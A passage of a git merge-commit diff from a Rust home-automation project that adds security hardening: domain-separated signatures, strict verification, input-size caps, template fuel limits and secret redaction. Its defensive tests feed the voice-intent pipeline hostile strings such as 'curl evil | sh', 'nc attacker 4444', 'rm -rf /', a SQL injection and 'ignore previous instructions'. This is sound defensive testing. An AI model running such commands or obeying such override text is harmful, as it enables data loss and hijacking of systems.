Merge remote-tracking branch 'origin/main' into pr-1082-review

# Conflicts:
#	CHANGELOG.md
This commit is contained in:
ruv
2026-06-15 10:07:53 -04:00
55 changed files with 4569 additions and 62 deletions
+78 -11
View File
@@ -102,19 +102,43 @@ pub struct WitnessEvent {
pub this_hash: WitnessHash,
}
/// Domain-separation tag prefixing every witness canonical message.
///
/// This is the *domain tag* half of the "domain-tag + length-prefix"
/// rule for any hashed/signed message whose fields are
/// operator-influenceable. The witness chain already length-prefixes
/// `kind` and `payload` (preventing intra-protocol concatenation
/// forgery); the tag adds cross-protocol separation so a SHA-256
/// preimage / Ed25519 message produced here can never be re-interpreted
/// as a message from another signing context that shares key
/// infrastructure — notably ADR-116's *manifest* `binary_signature`
/// (Ed25519 over `binary_sha256`), which ADR-262 P2 reuses this exact
/// chain for. A signature is only ever valid for the one domain whose
/// tag it commits to.
///
/// The trailing NUL terminates the version string so a future
/// migration (Blake3, extra fields, Merkle tier) bumps the tag instead
/// of silently colliding with v1 bundles.
pub const WITNESS_DOMAIN_TAG: &[u8] = b"cog-ha-matter/witness-event/v1\x00";
/// Compute the canonical-bytes form an event is hashed over.
///
/// The format is intentionally simple and length-prefixed so a
/// future migration can be staged with a `version` byte in front
/// without ambiguity:
/// The format is domain-tagged and length-prefixed:
///
/// ```text
/// prev_hash[32] | seq:u64-be | ts:u64-be | kind_len:u32-be | kind | payload_len:u32-be | payload
/// DOMAIN_TAG | prev_hash[32] | seq:u64-be | ts:u64-be
/// | kind_len:u32-be | kind | payload_len:u32-be | payload
/// ```
///
/// Length-prefixing prevents the classic "concatenation forgery"
/// attack where `"abc" + "def"` and `"ab" + "cdef"` would hash the
/// same.
/// * The leading [`WITNESS_DOMAIN_TAG`] gives cross-protocol
/// separation: bytes signed/hashed here cannot be replayed as a
/// message for another Ed25519 context in the same trust chain
/// (e.g. the manifest `binary_signature`). It also carries a format
/// version for staged migrations.
/// * Length-prefixing `kind` and `payload` prevents the classic
/// "concatenation forgery" where `"abc" + "def"` and `"ab" + "cdef"`
/// would hash the same. The fixed-width `prev_hash`/`seq`/`ts`
/// fields are self-delimiting.
pub fn canonical_bytes(
prev_hash: WitnessHash,
seq: u64,
@@ -123,7 +147,10 @@ pub fn canonical_bytes(
payload: &[u8],
) -> Vec<u8> {
let kind_bytes = kind.as_bytes();
let mut out = Vec::with_capacity(32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len());
let mut out = Vec::with_capacity(
WITNESS_DOMAIN_TAG.len() + 32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len(),
);
out.extend_from_slice(WITNESS_DOMAIN_TAG);
out.extend_from_slice(&prev_hash.0);
out.extend_from_slice(&seq.to_be_bytes());
out.extend_from_slice(&timestamp_unix_s.to_be_bytes());
@@ -466,11 +493,51 @@ mod tests {
}
#[test]
fn canonical_bytes_starts_with_prev_hash() {
fn canonical_bytes_starts_with_domain_tag_then_prev_hash() {
// Locks the on-wire format. A future migration that flips
// field order must bump a version byte and update this test.
// field order must bump the domain tag and update this test.
let bytes = canonical_bytes(WitnessHash([7u8; 32]), 1, 2, "k", b"p");
assert_eq!(&bytes[..32], &[7u8; 32]);
let tag = WITNESS_DOMAIN_TAG.len();
assert_eq!(&bytes[..tag], WITNESS_DOMAIN_TAG);
assert_eq!(&bytes[tag..tag + 32], &[7u8; 32]);
}
#[test]
fn canonical_bytes_is_domain_separated() {
// Cross-protocol separation: the witness preimage must begin
// with the domain tag so its SHA-256 / Ed25519 message can
// never be reinterpreted as a message from another signing
// context that shares key infrastructure (e.g. the manifest
// `binary_signature` over `binary_sha256`). Fails on the old
// un-tagged encoding, which began directly with `prev_hash`.
let bytes = canonical_bytes(WitnessHash::GENESIS, 0, 0, "k", b"p");
assert!(
bytes.starts_with(WITNESS_DOMAIN_TAG),
"canonical message is not domain-separated"
);
// The tag is versioned and NUL-terminated.
assert!(WITNESS_DOMAIN_TAG.ends_with(b"\x00"));
assert!(WITNESS_DOMAIN_TAG.windows(2).any(|w| w == b"v1"));
}
#[test]
fn witness_preimage_cannot_collide_with_a_bare_manifest_digest() {
// The manifest `binary_signature` signs a bare 64-byte
// SHA-256 hex string. A witness preimage must never *equal*
// such a string, even if an operator crafted kind/payload to
// try — the domain tag (33 bytes) + fixed 48-byte prefix make
// the witness message structurally longer and tag-distinct.
// Fails on the old encoding only if it could ever produce a
// 64-byte all-hex message; the tag makes the impossibility
// explicit and regression-guarded.
let manifest_digest_msg = "a".repeat(64); // 64 ASCII hex bytes
let witness = canonical_bytes(WitnessHash::GENESIS, 0, 0, "", b"");
assert_ne!(witness.as_slice(), manifest_digest_msg.as_bytes());
assert!(
witness.len() > manifest_digest_msg.len(),
"domain tag must make witness preimage structurally distinct"
);
assert!(!witness.starts_with(b"aaaa"));
}
#[test]
+64 -2
View File
@@ -36,7 +36,7 @@
//! key store (separate concern). Tests use a fixed-bytes seed for
//! determinism — never check in real Seed keys here.
use ed25519_dalek::{Signature, Signer, SigningKey, Verifier, VerifyingKey};
use ed25519_dalek::{Signature, Signer, SigningKey, VerifyingKey};
use crate::witness::{canonical_bytes, WitnessEvent};
@@ -58,6 +58,16 @@ pub fn sign_event(event: &WitnessEvent, key: &SigningKey) -> Signature {
/// Verify an Ed25519 signature against a witness event using the
/// Seed's public key. `Ok(())` iff the signature is valid for the
/// event's canonical bytes under this key.
///
/// Uses `verify_strict` (not the permissive `Verifier::verify`) on
/// purpose: for a tamper-evident *audit* chain the signature is the
/// attestation, so non-canonical encodings and small-order public
/// keys must be rejected. `verify_strict` enforces RFC 8032's
/// stricter checks, giving the "one canonical signature per event"
/// property an auditor relies on when comparing or deduplicating
/// signed witness records. The public key is caller-pinned (the
/// Seed's known verifying key) — never parsed from the event — so a
/// forged event carrying its own key cannot self-verify.
pub fn verify_signature(
event: &WitnessEvent,
signature: &Signature,
@@ -71,7 +81,7 @@ pub fn verify_signature(
&event.payload,
);
public_key
.verify(&bytes, signature)
.verify_strict(&bytes, signature)
.map_err(|_| SignatureVerifyError::Invalid)
}
@@ -140,6 +150,58 @@ mod tests {
verify_signature(&event, &sig, &public).expect("clean signature verifies");
}
#[test]
fn signature_commits_to_domain_tag_not_bare_fields() {
// The signature is over the domain-tagged canonical bytes. A
// signature produced over the *un-tagged* concatenation of the
// same fields must NOT verify — proving cross-protocol
// separation reaches the signature layer, not just the hash.
// Fails on the old encoding where the signed message began
// directly with `prev_hash` (no tag).
use ed25519_dalek::Signer;
let key = fixed_key();
let public = key.verifying_key();
let event = fresh_event();
// Hand-build the OLD (un-tagged) preimage and sign it.
let mut untagged = Vec::new();
untagged.extend_from_slice(&event.prev_hash.0);
untagged.extend_from_slice(&event.seq.to_be_bytes());
untagged.extend_from_slice(&event.timestamp_unix_s.to_be_bytes());
untagged.extend_from_slice(&(event.kind.len() as u32).to_be_bytes());
untagged.extend_from_slice(event.kind.as_bytes());
untagged.extend_from_slice(&(event.payload.len() as u32).to_be_bytes());
untagged.extend_from_slice(&event.payload);
let old_sig = key.sign(&untagged);
// The current verifier (which uses the domain-tagged message)
// must reject a signature made over the un-tagged bytes.
let err = verify_signature(&event, &old_sig, &public).unwrap_err();
assert_eq!(err, SignatureVerifyError::Invalid);
// Sanity: the proper signature still verifies.
let good = sign_event(&event, &key);
verify_signature(&event, &good, &public).expect("tagged signature verifies");
}
#[test]
fn verify_uses_strict_path_and_pins_caller_key() {
// Regression guard: verification must run through the strict
// path against a CALLER-supplied key. A wrong key fails; the
// event never carries its own verifying key, so a forged event
// cannot self-attest. (verify_strict additionally rejects
// non-canonical / small-order encodings.)
let key = fixed_key();
let wrong = SigningKey::from_bytes(b"another-wrong-key-another-wrong-");
let event = fresh_event();
let sig = sign_event(&event, &key);
verify_signature(&event, &sig, &key.verifying_key()).expect("right key verifies");
assert_eq!(
verify_signature(&event, &sig, &wrong.verifying_key()).unwrap_err(),
SignatureVerifyError::Invalid
);
}
#[test]
fn verify_rejects_signature_under_wrong_key() {
let key = fixed_key();
@@ -149,6 +149,44 @@ mod tests {
assert!(sim_unrel < 0.3, "unrelated similarity too high: {sim_unrel:.3}");
}
#[test]
fn embeddings_are_structurally_finite() {
// SECURITY (NaN-poisoning): the embedding path takes only `&str` and
// produces values via FNV feature-hashing + a guarded L2 normalise.
// There is NO external float input and NO unguarded division, so a
// crafted utterance cannot inject NaN/±Inf into a vector and poison the
// cosine k-NN match. Prove every component is finite across adversarial
// inputs (empty, punctuation-only, unicode, very long, control chars).
for s in [
"",
"!!! ???",
"turn on the kitchen light",
"🔥🔥🔥 \u{0}\u{1}\u{7f} mix",
&"x".repeat(10_000),
"NaN inf -inf 1e999",
] {
let v = embed(s);
assert_eq!(v.len(), EMBEDDING_DIM);
assert!(
v.iter().all(|x| x.is_finite()),
"embedding of {s:?} contained a non-finite component"
);
}
}
#[test]
fn cosine_with_zero_vector_is_finite_not_nan() {
// SECURITY (NaN-poisoning): an empty/punctuation-only utterance embeds
// to the zero vector. Cosine against any exemplar must be a finite 0.0,
// never NaN — so a below-threshold comparison stays well-defined and the
// recognizer falls through (no action) rather than matching on garbage.
let zero = embed("!!! ???");
let real = embed("turn on the light");
let sim = cosine_similarity(&zero, &real);
assert!(sim.is_finite(), "cosine vs zero vector must be finite, got {sim}");
assert_eq!(sim, 0.0, "dot product with the zero vector is exactly 0");
}
#[test]
fn identical_text_is_similarity_one() {
let a = embed("lock the front door");
+3 -1
View File
@@ -47,7 +47,9 @@ pub mod pipeline;
pub mod embedding;
pub use intent::{Card, Intent, IntentName, IntentResponse};
pub use recognizer::{IntentRecognizer, RecognizerError, RegexIntentRecognizer};
pub use recognizer::{
IntentRecognizer, RecognizerError, RegexIntentRecognizer, MAX_UTTERANCE_BYTES,
};
pub use semantic_recognizer::{SemanticIntentRecognizer, DEFAULT_SIMILARITY_THRESHOLD};
pub use handler::{
HandlerError, HassCancelAll, HassLightSet, HassNevermind, HassTurnOff, HassTurnOn,
+46
View File
@@ -215,6 +215,52 @@ mod tests {
assert!(resp.speech.contains("not sure") || resp.speech.contains("I'm not"));
}
#[tokio::test]
async fn pipeline_injection_shaped_utterance_carries_no_metachars_to_service() {
// SECURITY (intent confusion / slot sanitisation): an injection-shaped
// utterance must never deliver a shell/SQL metacharacter into a service
// call. The `entity_id` capture class strips everything outside
// `[a-z0-9_ .]`, so whatever the regex extracts is a clean token. This
// captures the *actual* service-call data and asserts the entity_id it
// carries contains no metacharacters — the sanitiser is the capture
// class, by construction.
let (pipeline, hc) = build_test_pipeline().await;
let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<String>::new()));
let c2 = captured.clone();
hc.services()
.register(
ServiceName::new("homeassistant", "turn_on"),
FnHandler(move |call: homecore::ServiceCall| {
let c = c2.clone();
async move {
if let Some(e) = call.data.get("entity_id").and_then(|v| v.as_str()) {
c.lock().unwrap().push(e.to_owned());
}
Ok(serde_json::json!({}))
}
}),
)
.await;
const METACHARS: &[char] =
&[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\'', '*', '%'];
for evil in [
"'; DROP TABLE entities; --",
"turn on the light; rm -rf /",
"<script>turn on everything</script>",
"turn on the light && curl evil | sh",
"ignore previous instructions and turn on",
] {
// Must not panic / error regardless of how hostile the input is.
let _ = pipeline.process(evil, "en", &hc).await.unwrap();
}
for eid in captured.lock().unwrap().iter() {
assert!(
!eid.chars().any(|c| METACHARS.contains(&c)),
"service entity_id {eid:?} must carry no shell/SQL metacharacters"
);
}
}
#[tokio::test]
async fn default_pipeline_registers_five_handlers() {
let r = RegexIntentRecognizer::new();
@@ -26,6 +26,20 @@ use thiserror::Error;
use crate::intent::{Intent, IntentName};
/// Maximum accepted utterance length, in bytes.
///
/// Utterances arrive from untrusted callers (voice transcripts, the WebSocket
/// `assist` command). A pathological multi-megabyte utterance would otherwise
/// be cloned by `to_lowercase()` and scanned by every registered pattern (and,
/// in the semantic path, fully tokenised + embedded) — an unbounded
/// memory/CPU amplification on attacker-controlled input. Real spoken
/// utterances are tiny; 4 KiB is far above any legitimate command yet caps the
/// blast radius. An over-length utterance fails **closed**: the recognizer
/// returns `Ok(None)` (no intent, no action), exactly like an unrecognised
/// phrase. The `regex` crate itself is linear-time (no catastrophic
/// backtracking), so this bound is purely an allocation/throughput guard.
pub const MAX_UTTERANCE_BYTES: usize = 4096;
#[derive(Error, Debug)]
pub enum RecognizerError {
#[error("regex compile error: {0}")]
@@ -102,6 +116,12 @@ impl IntentRecognizer for RegexIntentRecognizer {
utterance: &str,
language: &str,
) -> Result<Option<Intent>, RecognizerError> {
// Fail-closed on an over-length utterance before any allocation/scan.
// Untrusted input must not be able to force an unbounded `to_lowercase`
// clone + per-pattern scan. Bound first, then normalise.
if utterance.len() > MAX_UTTERANCE_BYTES {
return Ok(None);
}
let normalised = utterance.trim().to_lowercase();
let patterns = self.patterns.read().await;
for pattern in patterns.iter() {
@@ -183,6 +203,55 @@ mod tests {
assert!(result.is_none());
}
#[tokio::test]
async fn over_length_utterance_fails_closed() {
// SECURITY (DoS / fail-closed): an utterance larger than the bound must
// return Ok(None) WITHOUT being normalised or scanned. Crucially, even
// an over-length utterance that *contains* a matching command must NOT
// resolve — fail closed, never open.
//
// This FAILS against the pre-fix recognizer: there, a giant prefix
// followed by "turn on the kitchen light" would still match HassTurnOn
// (and force a multi-megabyte `to_lowercase` clone + scan first).
let r = turn_on_recognizer().await;
let huge = format!("{} turn on the kitchen light", "a ".repeat(MAX_UTTERANCE_BYTES));
assert!(huge.len() > MAX_UTTERANCE_BYTES);
let result = r.recognize(&huge, "en").await.unwrap();
assert!(
result.is_none(),
"over-length utterance must fail closed (no intent, no action)"
);
// And a just-under-bound utterance still works, so the cap doesn't
// break legitimate (tiny) commands.
let ok = r
.recognize("turn on the kitchen light", "en")
.await
.unwrap();
assert!(ok.is_some(), "normal-length command must still resolve");
}
#[tokio::test]
async fn pathological_backtracking_pattern_completes_in_bounded_time() {
// SECURITY (ReDoS): the `regex` crate is a linear-time finite automaton,
// so even a classic catastrophic-backtracking shape `(a+)+$` cannot hang
// on a crafted adversarial input. This proves the recognizer terminates
// promptly on the worst-case input the regex engine is asked to run.
let r = RegexIntentRecognizer::new();
r.register("Evil", r"(a+)+$", "*").await.unwrap();
// Just under the length bound: all 'a' then a 'b' — the classic input
// that destroys a backtracking engine. Linear-time regex shrugs.
let evil = format!("{}b", "a".repeat(MAX_UTTERANCE_BYTES - 1));
let start = std::time::Instant::now();
let _ = r.recognize(&evil, "en").await.unwrap();
let elapsed = start.elapsed();
assert!(
elapsed < std::time::Duration::from_secs(2),
"linear-time regex must not hang on adversarial input; took {elapsed:?}"
);
}
#[tokio::test]
async fn language_filter_skips_non_matching() {
let r = RegexIntentRecognizer::new();
+57
View File
@@ -393,6 +393,63 @@ mod tests {
assert!(matches!(err, AssistError::ParseError(_)));
}
#[tokio::test]
async fn shell_metachars_never_survive_into_a_resolved_slot() {
// SECURITY (command/argument injection): two layers of defense.
// 1. There is NO subprocess — `spawn` is a lifecycle flag and
// `RufloRunnerOpts` is inert, so no argv is ever built.
// 2. Even so, the `entity_id` capture class is `[a-z_][a-z0-9_ .]*`,
// which *excludes* every shell metacharacter. So when an
// injection-shaped utterance DOES resolve (the regex is not exact-
// anchored), the captured slot is a clean token with the hostile
// tail stripped — never `;`, `|`, `$`, backtick, `&`, `/`, etc.
// This pins the slot-sanitisation-by-construction property: a slot value
// can never carry a metachar into a (future) argv.
let mut runner = LocalRunner::new(turn_on_recognizer().await);
runner.spawn(RufloRunnerOpts::default()).await.unwrap();
const METACHARS: &[char] = &[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\''];
for evil in [
"turn on the light; rm -rf /",
"turn on the light && shutdown -h now",
"turn on the light | nc attacker 4444",
"turn on the light `curl evil.sh | sh`",
"turn on the light $(reboot)",
] {
let resp = runner
.send_request(serde_json::json!({"utterance": evil, "language": "en"}))
.await
.unwrap();
if let Some(intent) = resp.intent {
if let Some(eid) = intent.entity_id() {
assert!(
!eid.chars().any(|c| METACHARS.contains(&c)),
"resolved entity_id {eid:?} from {evil:?} must contain no shell metachars"
);
}
}
}
}
#[tokio::test]
async fn runner_opts_are_inert_no_process_spawned() {
// SECURITY (command injection): even a hostile `script_path` / `env` in
// RufloRunnerOpts is never consumed — `spawn` launches no process. This
// documents-and-pins that the data-gated P2 subprocess is genuinely
// absent (confirmed Noop/Local, no spawn surface today).
let mut env = std::collections::HashMap::new();
env.insert("EVIL".to_owned(), "$(rm -rf /)".to_owned());
let opts = RufloRunnerOpts {
script_path: "/bin/sh -c 'curl evil | sh'".to_owned(),
env,
timeout_ms: 1,
};
let mut runner = NoopRunner::new();
// No panic, no spawn, no error — the opts are pure data.
assert!(runner.spawn(opts.clone()).await.is_ok());
let mut local = LocalRunner::new(turn_on_recognizer().await);
assert!(local.spawn(opts).await.is_ok());
}
#[tokio::test]
async fn local_runner_send_before_spawn_is_not_started() {
let runner = LocalRunner::new(turn_on_recognizer().await);
@@ -135,6 +135,12 @@ impl SemanticIntentRecognizer {
utterance: &str,
language: &str,
) -> Result<(Option<Intent>, Option<f32>), RecognizerError> {
// Fail-closed on an over-length utterance before embedding/scanning.
// Untrusted input must not force an unbounded `to_lowercase` clone +
// full tokenisation/embedding. Mirrors the regex recognizer's bound.
if utterance.len() > crate::recognizer::MAX_UTTERANCE_BYTES {
return Ok((None, None));
}
if let Some((id, similarity)) = self.nearest(utterance, language).await {
if similarity >= self.threshold {
let inner = self.index.read().await;
@@ -228,6 +234,32 @@ mod tests {
r
}
#[tokio::test]
async fn empty_utterance_against_empty_index_no_panic_no_match() {
// SECURITY (NaN/empty-poisoning): an empty (zero-vector) query against an
// empty index must not panic and must yield no intent — the recognizer
// falls through to the (also empty) regex fallback. Proves the empty-
// iterator `max_by` path returns None cleanly.
let semantic = SemanticIntentRecognizer::new(RegexIntentRecognizer::new());
let result = semantic.recognize("", "en").await.unwrap();
assert!(result.is_none(), "empty utterance must produce no intent / no action");
}
#[tokio::test]
async fn over_length_utterance_fails_closed_semantic() {
// SECURITY (DoS / fail-closed): an over-length utterance must short-
// circuit before embedding/scanning, returning no intent — even if it
// textually contains an enrolled/fallback-matchable command.
let semantic = SemanticIntentRecognizer::new(turn_on_recognizer().await);
let huge = format!(
"{} turn on the kitchen light",
"a ".repeat(crate::recognizer::MAX_UTTERANCE_BYTES)
);
assert!(huge.len() > crate::recognizer::MAX_UTTERANCE_BYTES);
let result = semantic.recognize(&huge, "en").await.unwrap();
assert!(result.is_none(), "over-length utterance must fail closed in semantic path");
}
#[tokio::test]
async fn semantic_recognizer_delegates_to_fallback() {
// No exemplars enrolled → empty HNSW index → pure regex fallback.
+4 -2
View File
@@ -29,8 +29,10 @@ serde = { version = "1", features = ["derive"] }
serde_yaml = "0.9"
serde_json = "1"
# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1)
minijinja = { version = "2", features = ["json", "loader"] }
# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1).
# `fuel` bounds instruction count so a malicious `template:` condition cannot
# spin the engine with a nested-loop / huge-repeat DoS (HC-SEC-01).
minijinja = { version = "2", features = ["json", "loader", "fuel"] }
# Error handling
thiserror = "1"
+94 -2
View File
@@ -70,6 +70,32 @@ impl ExecutionContext {
}
}
/// Upper bound for a `delay` / `wait_for_trigger` timeout, in seconds
/// (~100 years). Caps absurd values so `Duration::from_secs_f64` cannot
/// overflow-panic on e.g. `seconds: 1e308`, while still allowing any
/// realistic automation delay (HC-SEC-02).
const MAX_DELAY_SECS: f64 = 3.15e9;
/// Convert a user-supplied seconds value into a `Duration` without
/// panicking (HC-SEC-02).
///
/// `Duration::from_secs_f64` **panics** on negative, NaN, infinite, or
/// overflowing inputs. Those values are all reachable from a crafted
/// automation YAML (`delay: {seconds: -1}`, `.nan`, `.inf`, `1e308`), so a
/// single hostile config would crash the running automation task. We
/// instead saturate to a safe range — matching Home Assistant's lenient
/// treatment of a non-positive delay as "no delay":
///
/// - non-finite (NaN / ±inf) → `0`
/// - negative → `0`
/// - above [`MAX_DELAY_SECS`] → clamped to the cap
fn safe_duration_from_secs(seconds: f64) -> Duration {
if !seconds.is_finite() || seconds <= 0.0 {
return Duration::ZERO;
}
Duration::from_secs_f64(seconds.min(MAX_DELAY_SECS))
}
/// Action configuration. Deserialized from YAML `action:` blocks.
#[derive(Clone, Debug, Serialize, Deserialize)]
#[serde(tag = "action", rename_all = "snake_case")]
@@ -154,7 +180,10 @@ impl Action {
Ok(result)
}
Action::Delay { seconds } => {
let dur = Duration::from_secs_f64(*seconds);
// `safe_duration_from_secs` guards against negative /
// NaN / infinite / overflowing values that would
// otherwise panic `Duration::from_secs_f64` (HC-SEC-02).
let dur = safe_duration_from_secs(*seconds);
sleep(dur).await;
Ok(serde_json::Value::Null)
}
@@ -172,7 +201,8 @@ impl Action {
// P1 stub — just sleeps for the timeout duration if specified.
// Full trigger subscription lands in P2.
if let Some(secs) = timeout_seconds {
sleep(Duration::from_secs_f64(*secs)).await;
// Same non-panicking guard as `Delay` (HC-SEC-02).
sleep(safe_duration_from_secs(*secs)).await;
}
Ok(serde_json::Value::Null)
}
@@ -243,6 +273,68 @@ mod tests {
assert!(result.is_null());
}
// ── HC-SEC-02: a crafted delay must not panic the run task ─────────
//
// `Duration::from_secs_f64` panics on negative / NaN / infinite /
// overflowing inputs, all reachable from a YAML `delay:` value. On the
// pre-fix code each of these aborts the spawned automation task with a
// panic; the guard saturates to a safe Duration instead. These tests
// fail on old (panic = test failure).
#[tokio::test]
async fn delay_negative_seconds_does_not_panic() {
let hc = HomeCore::new();
let mut ctx = ExecutionContext::new(hc, "auto");
let result = Action::Delay { seconds: -1.0 }.execute(&mut ctx).await;
assert!(result.is_ok(), "negative delay must be treated as 0, not panic");
}
#[tokio::test]
async fn delay_nan_seconds_does_not_panic() {
let hc = HomeCore::new();
let mut ctx = ExecutionContext::new(hc, "auto");
let result = Action::Delay { seconds: f64::NAN }.execute(&mut ctx).await;
assert!(result.is_ok(), "NaN delay must be treated as 0, not panic");
}
#[tokio::test]
async fn delay_infinite_seconds_does_not_panic() {
let hc = HomeCore::new();
let mut ctx = ExecutionContext::new(hc, "auto");
let result = Action::Delay { seconds: f64::INFINITY }.execute(&mut ctx).await;
assert!(result.is_ok(), "infinite delay must saturate to 0, not panic");
}
// Note: the overflow case (1e300) is covered by the synchronous
// `safe_duration_saturates_hostile_values` unit test below — executing
// `Action::Delay { seconds: 1e300 }` would genuinely sleep for the
// clamped (~100-year) duration, so we assert the conversion directly
// rather than through `execute`.
#[tokio::test]
async fn wait_for_trigger_negative_timeout_does_not_panic() {
let hc = HomeCore::new();
let mut ctx = ExecutionContext::new(hc, "auto");
let result = Action::WaitForTrigger { timeout_seconds: Some(-5.0) }
.execute(&mut ctx)
.await;
assert!(result.is_ok(), "negative wait timeout must not panic");
}
#[test]
fn safe_duration_saturates_hostile_values() {
assert_eq!(safe_duration_from_secs(-1.0), Duration::ZERO);
assert_eq!(safe_duration_from_secs(f64::NAN), Duration::ZERO);
assert_eq!(safe_duration_from_secs(f64::INFINITY), Duration::ZERO);
assert_eq!(safe_duration_from_secs(f64::NEG_INFINITY), Duration::ZERO);
// legitimate value preserved
assert_eq!(safe_duration_from_secs(2.5), Duration::from_secs_f64(2.5));
// huge value clamped to the cap, not overflow-panicked
assert_eq!(
safe_duration_from_secs(1e300),
Duration::from_secs_f64(MAX_DELAY_SECS)
);
}
#[tokio::test]
async fn service_call_unregistered_returns_error() {
let hc = HomeCore::new();
@@ -13,6 +13,26 @@ use homecore::{EntityId, StateMachine};
use crate::error::AutomationError;
/// Instruction budget for a single template render (HC-SEC-01).
///
/// Templates come from user automation config; without a bound a single
/// `template:` condition like
/// `{% for i in range(10000) %}{% for j in range(10000) %}x{% endfor %}{% endfor %}`
/// renders a multi-gigabyte string and pins a CPU for tens of seconds —
/// a memory/CPU denial-of-service (the bfld-class "unbounded expansion").
/// MiniJinja's `fuel` feature charges ~1 unit per VM instruction; a
/// nested loop burns one unit per iteration, so the budget caps total
/// work regardless of how the loops are nested. 1,000,000 instructions is
/// far more than any legitimate HA template needs (a typical condition is
/// a few dozen) while killing the attack in well under a second.
const TEMPLATE_FUEL: u64 = 1_000_000;
/// Hard cap on the source length of a template (HC-SEC-01, defense in
/// depth). A legitimate HA `value_template` is a one-liner; anything past
/// 64 KiB is rejected before compilation so a pathological source string
/// can neither be compiled nor emitted verbatim.
const MAX_TEMPLATE_SOURCE_BYTES: usize = 64 * 1024;
/// MiniJinja environment pre-loaded with HA-compatible globals.
///
/// Constructed once per `AutomationEngine` and shared via `Arc`. The
@@ -27,6 +47,10 @@ impl TemplateEnvironment {
pub fn new(states: Arc<StateMachine>) -> Self {
let mut env = Environment::new();
// Bound per-render work so a hostile `template:` condition cannot
// DoS the engine via nested loops / huge repeats (HC-SEC-01).
env.set_fuel(Some(TEMPLATE_FUEL));
// --- states(entity_id) ---
// Returns the current state string of an entity, or "unavailable".
let states_sm = Arc::clone(&states);
@@ -88,7 +112,21 @@ impl TemplateEnvironment {
}
/// Render a template string and return the string output.
///
/// Renders are bounded by an instruction budget ([`TEMPLATE_FUEL`]) and
/// a source-length cap ([`MAX_TEMPLATE_SOURCE_BYTES`]); a malicious
/// template that exhausts the budget returns a [`AutomationError::TemplateRender`]
/// error rather than running unbounded (HC-SEC-01).
pub fn render(&self, template_str: &str) -> Result<String, AutomationError> {
// Reject pathologically large sources before compilation (defense
// in depth — fuel already bounds runtime work).
if template_str.len() > MAX_TEMPLATE_SOURCE_BYTES {
return Err(AutomationError::TemplateRender(format!(
"template source too large: {} bytes (max {})",
template_str.len(),
MAX_TEMPLATE_SOURCE_BYTES
)));
}
// Wrap bare expressions like `{{ states('light.kitchen') }}`
// in a minimal template wrapper.
let tmpl = self
@@ -191,4 +229,68 @@ mod tests {
assert!(!env.render_bool("0").unwrap());
assert!(!env.render_bool("off").unwrap());
}
// ── HC-SEC-01: template DoS is bounded by fuel ─────────────────────
//
// A `template:` condition is user config. Before the fuel bound a
// nested-loop template rendered a multi-GB string over ~11 s (proven
// empirically). With fuel enabled it must fail FAST with an error
// instead of expanding unboundedly. On the pre-fix code (no `fuel`
// feature / `set_fuel`) this render succeeds and burns CPU+RAM, so
// this test fails on old (it would `Ok` and exceed the time bound).
#[test]
fn nested_loop_template_is_bounded_not_unbounded_dos() {
use std::time::Instant;
let sm = Arc::new(StateMachine::new());
let env = TemplateEnvironment::new(sm);
// 5000 * 5000 = 25M iterations on the old engine (~100 MB, ~11 s).
let malicious =
"{% for i in range(5000) %}{% for j in range(5000) %}xxxx{% endfor %}{% endfor %}";
let start = Instant::now();
let result = env.render(malicious);
let elapsed = start.elapsed();
assert!(
result.is_err(),
"malicious nested-loop template must be rejected (ran out of fuel), got Ok"
);
assert!(
elapsed.as_secs() < 3,
"bounded render must fail fast; took {elapsed:?} (unbounded DoS on old engine)"
);
}
// ── HC-SEC-01: a single huge repeat is also bounded ────────────────
#[test]
fn single_huge_repeat_template_is_bounded() {
let sm = Arc::new(StateMachine::new());
let env = TemplateEnvironment::new(sm);
// range() caps at 10k per call, but multiplied bodies still need a
// bound; drive enough instructions to exhaust fuel via deep nesting.
let malicious = "{% for a in range(9999) %}{% for b in range(9999) %}\
{% for c in range(9999) %}z{% endfor %}{% endfor %}{% endfor %}";
let result = env.render(malicious);
assert!(result.is_err(), "deeply nested loops must exhaust fuel and error");
}
// ── HC-SEC-01: oversized template source is rejected pre-compile ───
#[test]
fn oversized_template_source_is_rejected() {
let sm = Arc::new(StateMachine::new());
let env = TemplateEnvironment::new(sm);
// 128 KiB of literal text — exceeds MAX_TEMPLATE_SOURCE_BYTES.
let big = "x".repeat(128 * 1024);
let result = env.render(&big);
assert!(result.is_err(), "oversized template source must be rejected");
}
// ── A legitimate small template still renders fine within budget ───
#[test]
fn legitimate_template_still_renders_within_fuel() {
let sm = sm_with("light.kitchen", "on", serde_json::json!({}));
let env = TemplateEnvironment::new(sm);
// A normal HA condition with a modest loop — well under budget.
let ok = "{% for i in range(50) %}{{ states('light.kitchen') }}{% endfor %}";
let out = env.render(ok).expect("legitimate template must render");
assert!(out.contains("on"));
}
}
+19
View File
@@ -55,6 +55,25 @@ pub enum MigrateError {
source: serde_yaml::Error,
},
/// Parse failure in a SECRET-bearing file (`secrets.yaml`).
///
/// Unlike [`MigrateError::YamlParse`], this variant deliberately does NOT
/// embed the underlying `serde_yaml::Error` message — that message can quote
/// the offending scalar verbatim (e.g. a typed-tag coercion error renders
/// `invalid value: string "<the-secret-value>"`), which would leak a secret
/// into stderr/logs. We carry only the file path plus a coarse line/column
/// so the user can locate the problem without the value being printed.
/// (ADR-165 secret-handling rule: a secret value must never appear in output.)
#[error(
"secrets.yaml parse error in {path} (line {line}, column {column}): \
malformed YAML (value content redacted)"
)]
SecretsParse {
path: String,
line: usize,
column: usize,
},
/// Fired when the outer `{version, minor_version}` envelope version is
/// known but the `minor_version` is not supported by any compiled parser.
/// Per ADR-165 §6 Q5: hard error on unknown minor_version.
+65 -4
View File
@@ -33,11 +33,19 @@ pub fn read_secrets(path: &Path) -> Result<HashMap<String, String>, MigrateError
return Ok(HashMap::new());
}
let parsed: serde_yaml::Value =
serde_yaml::from_str(&raw).map_err(|e| MigrateError::YamlParse {
// SECURITY: do NOT use `MigrateError::YamlParse` here. serde_yaml error
// messages can quote the offending scalar verbatim (a typed-tag coercion
// error renders `invalid value: string "<the-secret-value>"`), and that
// message would be printed to stderr by the CLI — leaking a secret value.
// `MigrateError::SecretsParse` carries only the path + line/column.
let parsed: serde_yaml::Value = serde_yaml::from_str(&raw).map_err(|e| {
let loc = e.location();
